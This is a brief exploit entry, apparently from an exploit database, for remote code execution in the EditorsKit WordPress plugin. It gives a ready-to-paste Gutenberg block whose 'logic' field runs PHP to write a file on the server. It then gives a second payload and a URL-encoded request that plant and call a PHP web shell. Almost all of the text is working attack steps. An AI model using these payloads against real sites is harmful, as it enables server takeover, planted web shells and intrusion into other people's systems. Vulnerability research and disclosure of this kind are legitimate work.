Share 
## https://sploitus.com/exploit?id=WPEX-ID:BDC36F6A-682D-4D66-B587-92E86085D971
As a contributor, create/edit a post and put the below code while in Code Editor mode:

<!-- wp:paragraph {"editorskit":{"logic":"file_put_contents('/var/www/hacked.txt', 'hacked')","devices":false,"desktop":true,"tablet":true,"mobile":true,"loggedin":true,"loggedout":true,"acf_visibility":"","acf_field":"","acf_condition":"","acf_value":"","migrated":false,"unit_test":false}} -->\n<p>aa</p>\n<!-- /wp:paragraph -->

Save or Preview the page, which will create the /var/www/hacked.txt file


(WPscanTeam) To create a shell:
- Payload: file_put_contents('/var/www/hacked.php', wp_unslash($_GET['c']))
- View/preview the post and add &c=<?php echo 'failed'; ?> e.g: https://example.com/?p=1079&preview=true&c=%3C?php%20echo%20%27Failed%27;%20?%3E
- Access https://example.com/hacked.php to execute the code